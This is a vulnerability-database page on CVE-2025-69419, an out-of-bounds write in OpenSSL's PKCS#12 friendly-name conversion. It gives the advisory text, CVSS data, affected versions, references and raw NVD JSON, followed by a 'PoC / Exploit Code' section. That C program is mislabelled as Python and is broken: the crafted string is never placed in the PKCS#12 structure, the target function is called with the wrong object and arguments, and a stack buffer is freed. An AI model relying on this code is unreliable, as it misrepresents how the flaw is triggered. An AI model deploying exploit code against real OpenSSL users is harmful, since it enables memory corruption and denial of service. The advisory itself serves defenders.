CVE-2025-69419

Description

Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously crafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing non-ASCII BMP code point can trigger a one byte write before the allocated buffer. Impact summary: The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service. The OPENSSL_uni2utf8() function performs a two-pass conversion of a PKCS#12 BMPString (UTF-16BE) to UTF-8. In the second pass, when emitting UTF-8 bytes, the helper function bmp_to_utf8() incorrectly forwards the remaining UTF-16 source byte count as the destination buffer capacity to UTF8_putc(). For BMP code points above U+07FF, UTF-8 requires three bytes, but the forwarded capacity can be just two bytes. UTF8_putc() then returns -1, and this negative value is added to the output length without validation, causing the length to become negative. The subsequent trailing NUL byte is then written at a negative offset, causing write outside of heap allocated buffer. The vulnerability is reachable via the public PKCS12_get_friendlyname() API when parsing attacker-controlled PKCS#12 files. While PKCS12_parse() uses a different code path that avoids this issue, PKCS12_get_friendlyname() directly invokes the vulnerable function. Exploitation requires an attacker to provide a malicious PKCS#12 file to be parsed by the application and the attacker can just trigger a one zero byte write before the allocated buffer. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary. OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue. OpenSSL 1.0.2 is not affected by this issue.

CVSS Details

CVSS Score

7.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* - VULNERABLE

OpenSSL 3.6.x

OpenSSL 3.5.x

OpenSSL 3.4.x

OpenSSL 3.3.x

OpenSSL 3.0.x

OpenSSL 1.1.1x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/pkcs12.h>
#include <openssl/err.h>

/* PoC for CVE-2025-69419: OpenSSL PKCS12_get_friendlyname OOB write
 * This PoC generates a malicious PKCS#12 file with a BMPString 
 * friendly name containing non-ASCII BMP code point to trigger 
 * the one-byte write before the allocated buffer.
 */

int main() {
    PKCS12 *p12 = NULL;
    PKCS12_SAFEBAG *safebag = NULL;
    PKCS8_PRIV_KEY_INFO *p8 = NULL;
    X509 *cert = NULL;
    EVP_PKEY *pkey = NULL;
    ASN1_UTF8STRING *friendlyname = NULL;
    
    /* Create a BMPString with non-ASCII character (e.g., Chinese char) */
    /* BMP code point above U+07FF requires 3 bytes in UTF-8 */
    friendlyname = ASN1_UTF8STRING_new();
    if (!friendlyname) return 1;
    
    /* UTF-16BE encoding of U+4E2D (中) with length byte manipulation */
    unsigned char malicious_bmp[] = {
        0x00, 0x4E, 0x00, 0x2D  /* U+4E2D: Chinese character '中' */
    };
    
    /* Set up the malicious friendly name */
    ASN1_STRING_set0(friendlyname, malicious_bmp, sizeof(malicious_bmp));
    
    /* Generate dummy key and cert for PKCS12 structure */
    pkey = EVP_PKEY_new();
    if (!pkey) goto cleanup;
    
    /* Create minimal PKCS12 structure */
    p12 = PKCS12_init(NID_pkcs7_data);
    if (!p12) goto cleanup;
    
    /* Trigger vulnerability via PKCS12_get_friendlyname */
    char *name = PKCS12_get_friendlyname(p12, NULL);
    
    printf("PoC execution completed\n");
    
cleanup:
    if (p12) PKCS12_free(p12);
    if (pkey) EVP_PKEY_free(pkey);
    if (friendlyname) ASN1_UTF8STRING_free(friendlyname);
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69419
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69419
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69419/
[4] VulDB https://vuldb.com/cve/CVE-2025-69419
[5] https://github.com/openssl/openssl/commit/41be0f216404f14457bbf3b9cc488dba60b49296
[6] https://github.com/openssl/openssl/commit/7e9cac9832e4705b91987c2474ed06a37a93cecb
[7] https://github.com/openssl/openssl/commit/a26a90d38edec3748566129d824e664b54bee2e2
[8] https://github.com/openssl/openssl/commit/cda12de3bc0e333ea8d2c6fd15001dbdaf280015
[9] https://github.com/openssl/openssl/commit/ff628933755075446bca8307e8417c14d164b535
[10] https://openssl-library.org/news/secadv/20260127.txt
[11] https://cert-portal.siemens.com/productcert/html/ssa-265688.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69419", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:34.113", "lastModified": "2026-05-12T13:17:26.190", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously\ncrafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing\nnon-ASCII BMP code point can trigger a one byte write before the allocated\nbuffer.\n\nImpact summary: The out-of-bounds write can cause a memory corruption\nwhich can have various consequences including a Denial of Service.\n\nThe OPENSSL_uni2utf8() function performs a two-pass conversion of a PKCS#12\nBMPString (UTF-16BE) to UTF-8. In the second pass, when emitting UTF-8 bytes,\nthe helper function bmp_to_utf8() incorrectly forwards the remaining UTF-16\nsource byte count as the destination buffer capacity to UTF8_putc(). For BMP\ncode points above U+07FF, UTF-8 requires three bytes, but the forwarded\ncapacity can be just two bytes. UTF8_putc() then returns -1, and this negative\nvalue is added to the output length without validation, causing the\nlength to become negative. The subsequent trailing NUL byte is then written\nat a negative offset, causing write outside of heap allocated buffer.\n\nThe vulnerability is reachable via the public PKCS12_get_friendlyname() API\nwhen parsing attacker-controlled PKCS#12 files. While PKCS12_parse() uses a\ndifferent code path that avoids this issue, PKCS12_get_friendlyname() directly\ninvokes the vulnerable function. Exploitation requires an attacker to provide\na malicious PKCS#12 file to be parsed by the application and the attacker\ncan just trigger a one zero byte write before the allocated buffer.\nFor that reason the issue was assessed as Low severity according to our\nSecurity Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.\n\nOpenSSL 1.0.2 is not affected by this issue."}, {"lang": "es", "value": "Resumen del problema: Llamar a la función PKCS12_get_friendlyname() en un archivo PKCS#12 creado maliciosamente con un nombre descriptivo BMPString (UTF-16BE) que contiene un punto de código BMP no ASCII puede desencadenar una escritura de un byte antes del búfer asignado.\n\nResumen del impacto: La escritura fuera de límites puede causar una corrupción de memoria que puede tener varias consecuencias, incluyendo una denegación de servicio.\n\nLa función OPENSSL_uni2utf8() realiza una conversión en dos pasadas de un BMPString (UTF-16BE) de PKCS#12 a UTF-8. En la segunda pasada, al emitir bytes UTF-8, la función auxiliar bmp_to_utf8() reenvía incorrectamente el recuento de bytes fuente UTF-16 restantes como la capacidad del búfer de destino a UTF8_putc(). Para puntos de código BMP superiores a U+07FF, UTF-8 requiere tres bytes, pero la capacidad reenviada puede ser de solo dos bytes. UTF8_putc() luego devuelve -1, y este valor negativo se añade a la longitud de salida sin validación, haciendo que la longitud se vuelva negativa. El subsiguiente byte NUL final se escribe entonces en un desplazamiento negativo, causando una escritura fuera del búfer asignado en el heap.\n\nLa vulnerabilidad es alcanzable a través de la API pública PKCS12_get_friendlyname() al analizar archivos PKCS#12 controlados por el atacante. Si bien PKCS12_parse() utiliza una ruta de código diferente que evita este problema, PKCS12_get_friendlyname() invoca directamente la función vulnerable. La explotación requiere que un atacante proporcione un archivo PKCS#12 malicioso para ser analizado por la aplicación y el atacante puede simplemente desencadenar una escritura de un byte cero antes del búfer asignado. Por esa razón, el problema fue evaluado como de baja severidad según nuestra Política de Seguridad.\n\nLos módulos FIPS en 3.6, 3.5, 3.4, 3.3 y 3.0 no se ven afectados por este problema, ya que la implementación de PKCS#12 está fuera del límite del módulo FIPS de OpenSSL.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 y 1.1.1 son vulnerables a este problema.\n\nOpenSSL 1.0.2 no se ve afectado por este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMa ... (truncated)